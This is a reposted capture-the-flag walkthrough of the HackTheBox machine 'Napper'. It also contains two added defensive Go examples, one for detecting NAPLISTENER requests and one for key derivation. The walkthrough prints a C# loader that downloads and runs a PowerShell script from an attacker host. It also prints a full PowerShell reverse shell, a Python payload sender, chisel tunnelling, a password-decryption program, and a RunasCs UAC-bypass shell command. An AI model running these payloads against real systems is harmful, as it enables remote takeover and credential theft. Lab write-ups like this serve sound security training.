HTB Napper notes

admin, 2023-11-17 13:08:10

Scanning the target

nmap -sC -sV -T5 -Pn  10.10.11.240

The scan shows two open ports and the hostname app.napper.htb. There may be other hostnames, so fuzz for them:

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "https://napper.htb" -H "Host: FUZZ.napper.htb" --hl 186

Fuzzing turns up an internal subdomain. Add it to the hosts file, then look at app.napper.htb first.

A quick look around shows a security research site. In the post "Enabling Basic Authentication on IIS Using PowerShell: A Step-by-Step Guide" there is a PowerShell command for setting up a new password.

This is the key point. Now open internal.napper.htb.

It requires a login; log in with the default username and password from that command.

Logged in successfully. Under the INTERNAL Malware research notes entry there are three links:

https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph

https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener

https://www.darkreading.com/threat-intelligence/custom-naplistener-malware-network-based-detection-sleep

All three links are research on NAPLISTENER, including how it runs. Further down the blog there is this sentence:

This means that any web request to /ews/MsExgHealthCheckd/ that contains a base64-encoded .NET assembly in the sdafwe3rwe23 parameter will be loaded and executed in memory. It's worth noting that the binary runs in a separate process and it is not associated with the running IIS server directly.

Reading it this way, my guess is that it is meant to test .NET programs, so we can package one as an exe and send it base64-encoded. Going back to the links the box provided, the hint is already given.
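From the defender's side, the quoted description gives three concrete indicators: the path, the parameter name, and a parameter value that decodes to a .NET assembly (a PE image, so the decoded bytes start with MZ). The Go program below is an added example, not code from this writeup or from the NAPLISTENER research; it parses a raw HTTP request and scores it against those indicators. The sample request is constructed inline with a fake MZ stub, not a real assembly, and the hostname app.napper.htb is taken from the page.

```go
package main

import (
	"bufio"
	"bytes"
	"encoding/base64"
	"fmt"
	"net/http"
	"net/url"
	"strings"
)

// Indicators quoted from the NAPLISTENER research notes above.
const (
	napPath  = "/ews/MsExgHealthCheckd/"
	napParam = "sdafwe3rwe23"
)

// Finding records why a request was flagged; Score 0 means nothing matched.
type Finding struct {
	Score   int
	Reasons []string
}

// decodeB64 tries the standard and URL-safe alphabets, padded or not.
func decodeB64(s string) ([]byte, bool) {
	s = strings.TrimSpace(s)
	for _, enc := range []*base64.Encoding{
		base64.StdEncoding, base64.URLEncoding,
		base64.RawStdEncoding, base64.RawURLEncoding,
	} {
		if b, err := enc.DecodeString(s); err == nil {
			return b, true
		}
	}
	return nil, false
}

// InspectRequest parses one raw HTTP request and scores it:
// +1 for the listener path, +1 for the magic parameter,
// +1 if the parameter decodes to a PE image (.NET assemblies are PE files, so they start with "MZ").
func InspectRequest(raw string) (Finding, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return Finding{}, err
	}
	var f Finding
	if strings.EqualFold(strings.TrimSuffix(req.URL.Path, "/"), strings.TrimSuffix(napPath, "/")) {
		f.Score++
		f.Reasons = append(f.Reasons, "path matches "+napPath)
	}
	// ParseForm reads both the query string and a form-encoded POST body.
	if err := req.ParseForm(); err != nil {
		return f, err
	}
	val := req.Form.Get(napParam)
	if val == "" {
		return f, nil
	}
	f.Score++
	f.Reasons = append(f.Reasons, "parameter "+napParam+" present")
	if blob, ok := decodeB64(val); ok && bytes.HasPrefix(blob, []byte("MZ")) {
		f.Score++
		f.Reasons = append(f.Reasons, fmt.Sprintf("value decodes to a %d-byte PE image (MZ header)", len(blob)))
	}
	return f, nil
}

// BuildSampleRequest constructs a demo request. The "assembly" is a fake
// MZ header plus filler text, not a real executable.
func BuildSampleRequest(path string, withPayload bool) string {
	body := ""
	if withPayload {
		fakePE := append([]byte("MZ\x90\x00"), []byte("constructed-stub-not-a-real-assembly")...)
		body = napParam + "=" + url.QueryEscape(base64.StdEncoding.EncodeToString(fakePE))
	}
	return fmt.Sprintf("POST %s HTTP/1.1\r\nHost: app.napper.htb\r\n"+
		"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s",
		path, len(body), body)
}

func main() {
	for _, raw := range []string{
		BuildSampleRequest(napPath, true),
		BuildSampleRequest("/index.html", false),
	} {
		f, err := InspectRequest(raw)
		fmt.Printf("score=%d reasons=%v err=%v\n", f.Score, f.Reasons, err)
	}
}
```

The path check alone is already a strong signal, since /ews/MsExgHealthCheckd/ is not an endpoint a normal IIS site serves; the MZ check is what separates a probe from an actual assembly delivery, so the score lets a rule fire at different severities.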

Following the hint from the links, capture a request to app.napper.htb, change it to a POST, change the path to /ews/MsExgHealthCheckd/ and add the sdafwe3rwe23 parameter in the body.

From the reverse-engineered code above, it is a single if branch: receive the upload, base64-decode it and run it. So write a C# program, compile it to an exe, base64-encode that and upload it.

shell.cs

using System;
using System.Diagnostics;
using System.Net;

namespace shell // <-- name file shell.cs
{
    public class Run
    {
        // The constructor does the work: the loader instantiates the class, so no Main logic is needed
        public Run()
        {
            var scriptUrl = "http://10.10.14.39/cxk.ps1";
            using (WebClient webClient = new WebClient())
            {
                // Download the PowerShell script from the URL
                string scriptContent = webClient.DownloadString(scriptUrl);
                var processStartInfo = new ProcessStartInfo("powershell.exe")
                {
                    // Pass the downloaded script content as a command
                    Arguments = scriptContent,
                    RedirectStandardOutput = true,
                    RedirectStandardError = true,
                    UseShellExecute = false,
                    CreateNoWindow = true
                };
                var process = new Process { StartInfo = processStartInfo };
                process.Start();
            }
        }

        public static void Main(string[] args)
        {
        }
    }
}

cxk.ps1

do {
    # Delay before establishing network connection, and between retries
    Start-Sleep -Seconds 1
    # Connect to C2
    try {
        $TCPClient = New-Object Net.Sockets.TCPClient('10.10.14.39', 443)
    } catch {}
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)

# Writes a string to C2
function WriteToStream ($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client receive buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}
    # Write to C2
    $StreamWriter.Write($String + 'caixukun> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the initial empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while (($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    # Execute command and save output (including errors thrown)
    $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String }
    # Write output to C2
    WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()

First compile it with mcs (Mono); see this article for reference:

https://blog.didierstevens.com/2017/09/06/compiling-a-windows-service-with-mono-on-kali/

mcs -reference:System.ServiceProcess.dll shell.cs

Then base64-encode the generated exe:

base64 shell.exe

Note that what gets encoded is the exe's bytes, not its file name. After changing the source, regenerate the exe, copy the base64 into Burp Suite and send it.

Reverse shell received; user flag:

98fbb05456fd1c8eaae38a9f07359835

Alternatively, write a Python script to send it in one step.

rev.py

import requests
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# base64 of shell.exe (the output of `base64 shell.exe`, joined into one line)
payload = "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"

hosts = ["napper.htb"]
# URL-encode the base64 so '+', '/' and '=' survive form encoding
form_field = f"sdafwe3rwe23={requests.utils.quote(payload)}"
for h in hosts:
    url_ssl = f"https://{h}/ews/MsExgHealthCheckd/"
    try:
        r_ssl = requests.post(url_ssl, data=form_field, verify=False)
        print(f"{url_ssl} : {r_ssl.status_code}{r_ssl.headers}")
    except KeyboardInterrupt:
        exit()
    except Exception as e:
        print(e)

After getting a shell, spawn an msfconsole session; it makes uploading and downloading convenient.

In C:\Program Files there is elasticsearch-8.8.0.

Under C:\Program Files\elasticsearch-8.8.0\data\indices\n5Gtg7mtSVOUFiVHo9w-Nw\index there are two .cfs files; dump them with type and filter with findstr:

type _o2.cfs | findstr pass

Those file names are random. This yields the password oKHzjZw0EGcRxT2cux5K for the user elastic.

Keep searching: in C:\Temp\www\internal\content\posts there are two .md files; read them:

C:\Temp\www\internal\content\posts>type first-re-research.md
---
title: "**INTERNAL** Malware research notes"
description: A collection of notes for the current research we might publish.
date: 2023-04-22
draft: false
tags: [re, .NET, malware]
---
# Introduction
| Meta | Data |
| --- | --- |
| Analyst | Ruben |
| Status | Initial analysis |
| Initial find | External Report |

The malware is a .NET sample. We are tracking the malware fond by Elastic who named it NAPLISTENER.
# What we know so far:
So it is a backdoor:
```txt
[...] HTTP listener written in C#, which we refer to as NAPLISTENER. Consistent with SIESTAGRAPH and other malware families developed or used by this threat, NAPLISTENER appears designed to evade network-based forms of detection. [...]
```
In the sanbox I can't find the URL.
```txt
This means that any web request to /ews/MsExgHealthCheckd/ that contains a base64-encoded .NET assembly in the sdafwe3rwe23 parameter will be loaded and executed in memory. It's worth noting that the binary runs in a separate process and it is not associated with the running IIS server directly.
```
Currently we are not sure on how to proceed.

# Log
* 2023-04-24: Did some more reading up. We need to look for some URL and a special parameter
* 2023-04-23: Starting the RE process. Not sure on how to approach.
* 2023-04-22: Nothing seems to be showing up in the sandbox, i just startes and stops again. Will be testing local
* 2023-04-22: Got the copy of the backdoor, running in sandbox


# Refrences
* https://www.elastic.co/security-labs/naplistener-more-bad-dreams-from-the-developers-of-siestagraph
* https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener
* https://www.darkreading.com/threat-intelligence/custom-naplistener-malware-network-based-detection-sleep

C:\Temp\www\internal\content\posts>

C:\Temp\www\internal\content\posts>type no-more-laps.md
---
title: "**INTERNAL** Getting rid of LAPS"
description: Replacing LAPS with out own custom solution
date: 2023-07-01
draft: true
tags: [internal, sysadmin]
---
# Intro
We are getting rid of LAPS in favor of our own custom solution. The password for the `backup` user will be stored in the local Elastic DB.
IT will deploy the decryption client to the admin desktops once it it ready.
We do expect the development to be ready soon. The Malware RE team will be the first test group.
C:\Temp\www\internal\content\posts>

Reading on, there is their home-grown LAPS replacement; the guess is that it is run through Elastic. In internal-laps-alpha there are two files, an exe and a .env.

The .env file contents mention port 9200.

First download a.exe to the local machine, this time using msfconsole.

If this happens, just change the session timeout.

Forward the port seen in .env out with chisel. On the attacker side:

chisel server --reverse --port 1118

On the target:

.\chisel client 10.10.14.39:1118 R:9200:127.0.0.1:9200

The tunnel is up; open a browser and visit local port 9200.

Enter the username and password obtained from the .cfs file.

See this article for reference; you can see seed and user-00001:

https://book.hacktricks.xyz/network-services-pentesting/9200-pentesting-elasticsearch

Then inspect both indices.

Note them down, then reverse the a.exe downloaded earlier with Ghidra.

Analysing the code: the seed and the encrypted blob parameter live in ES, and it invokes cmd.exe with the net command to change the backup user's password.

Scrolling down there is a genKey function, tied to the code above in main.main: it takes the seed parameter as its reference, and each generated key byte is a random value + 1.

Below that is main.encrypt, the encryption routine: AES, with the result base64-encoded.

Combining the analysis above, we need the matching ES data, that is the seed and the base64 blob from user-00001, and decrypt it to get the backup user's latest password. Since it is random, write a Go program to recover it:

go run cxk.go 55645459 nSbi9PAYJr9WSAxuQe5sq3jm8odJFQd_cb6ZCeYWEFj5PVUHCY2PWbIxctw8oaUCX8SfHNM0q-w=

Then upload RunasCs.exe, bypass UAC and get a shell back. Be quick, the seed and blob change over time.

.\RunasCs.exe backup BozRKbVkeMiNkNnotJWywpSNgwMEgHMoJkHacYns cmd.exe -r 10.10.14.39:443 --bypass-uac

Root flag obtained: d1c799957c042948be3b3974a98c5c2b. The backup user is in the same group as the administrator.

cxk.go

package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"log"
	"math/rand"
	"os"
	"strconv"
)

func checkErr(err error) {
	if err != nil {
		log.Fatal(err)
	}
}

// genKey mirrors a.exe: 16 key bytes from math/rand seeded with the stored seed, each rand.Intn(0xfe)+1.
func genKey(seed int) (key []byte) {
	// Same sequence as rand.Seed(seed) followed by rand.Intn; the top-level rand.Seed is a no-op since Go 1.24.
	r := rand.New(rand.NewSource(int64(seed)))
	for i := 0; i < 0x10; i++ {
		val := r.Intn(0xfe)
		key = append(key, byte(val+1))
	}
	return
}

func decrypt(seed int, enc []byte) (data []byte) {
	fmt.Printf("Seed: %v\n", seed)
	key := genKey(seed)
	fmt.Printf("Key: %v\n", key)
	iv := enc[:aes.BlockSize] // the first block of the blob is the IV
	fmt.Printf("IV: %v\n", iv)
	data = enc[aes.BlockSize:]

	block, err := aes.NewCipher(key)
	checkErr(err)

	stream := cipher.NewCFBDecrypter(block, iv)
	stream.XORKeyStream(data, data)
	fmt.Printf("Plaintext: %s\n", data)
	return
}

func main() {
	if len(os.Args) != 3 {
		fmt.Println("usage: go run cxk.go <seed> <base64url blob>")
		return
	}
	seed, err := strconv.Atoi(os.Args[1])
	checkErr(err)
	// the blob in ES uses the URL-safe alphabet ('-' and '_')
	enc, err := base64.URLEncoding.DecodeString(os.Args[2])
	checkErr(err)
	decrypt(seed, enc)
}
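The weakness the reversing exposes is that the AES key is fully determined by the integer seed stored next to the ciphertext in Elasticsearch, because math/rand is a deterministic generator: anyone who can read the index can rebuild the key. The Go program below is an added example, not part of this writeup or of a.exe. WeakKeyFromSeed re-implements that derivation only to show it is reproducible from the seed alone, and StrongKey, SealGCM and OpenGCM show the contrast with a key drawn from crypto/rand and an authenticated mode that rejects a modified blob. The seed value comes from the go run command on the page; the plaintext is a constructed sample, not the box's password.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	crand "crypto/rand"
	"errors"
	"fmt"
	"io"
	"math/rand"
)

// WeakKeyFromSeed re-implements the derivation seen in a.exe: 16 bytes from
// math/rand seeded with the integer that is stored next to the ciphertext.
// math/rand is deterministic, so whoever reads the seed rebuilds the key.
func WeakKeyFromSeed(seed int64) []byte {
	r := rand.New(rand.NewSource(seed)) // deterministic PRNG, not a CSPRNG
	key := make([]byte, 16)
	for i := range key {
		key[i] = byte(r.Intn(0xfe) + 1)
	}
	return key
}

// StrongKey draws an AES-256 key from the OS CSPRNG. There is no seed to
// store, so reading the database does not hand over the key.
func StrongKey() ([]byte, error) {
	key := make([]byte, 32)
	_, err := io.ReadFull(crand.Reader, key)
	return key, err
}

// SealGCM encrypts with AES-GCM under a fresh random nonce and returns
// nonce || ciphertext || tag. Unlike the CFB mode used by a.exe, the tag
// makes any modification of the stored blob detectable.
func SealGCM(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(crand.Reader, nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// OpenGCM reverses SealGCM and fails closed if the blob was tampered with
// or the key is wrong.
func OpenGCM(key, blob []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, errors.New("blob shorter than nonce")
	}
	return gcm.Open(nil, blob[:gcm.NonceSize()], blob[gcm.NonceSize():], nil)
}

func main() {
	// Seed taken from the writeup's go run command; the derived key is only illustrative here.
	k1, k2 := WeakKeyFromSeed(55645459), WeakKeyFromSeed(55645459)
	fmt.Printf("weak key reproducible from seed: %v\n", bytes.Equal(k1, k2))

	s1, _ := StrongKey()
	s2, _ := StrongKey()
	fmt.Printf("two strong keys identical: %v\n", bytes.Equal(s1, s2))

	blob, _ := SealGCM(s1, []byte("demo-backup-password")) // constructed sample plaintext
	pt, err := OpenGCM(s1, blob)
	fmt.Printf("round trip: %s (err=%v)\n", pt, err)
	blob[len(blob)-1] ^= 0x01 // flip one bit of the tag
	_, err = OpenGCM(s1, blob)
	fmt.Printf("tampered blob rejected: %v\n", err != nil)
}
```

The point of the comparison is that a random key solves only half of the problem: the decryption client still has to hold that key somewhere the admin can use but a low-privileged reader of the Elasticsearch index cannot, which is exactly what the custom scheme in no-more-laps.md failed to provide.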

Before getting the shell you can inspect the backup user:

.\RunasCs.exe backup dsIUMSAlEkjJDYXKeGHEfBwXeYieezlpgodWZKti "cmd /c whoami /all"

Originally published on the WeChat public account Jiyou too beautiful: HTB-Napper笔记 (HTB Napper notes)
Reposted by CN-SEC (keep this link when reposting): https://cn-sec.com/archives/2216213.html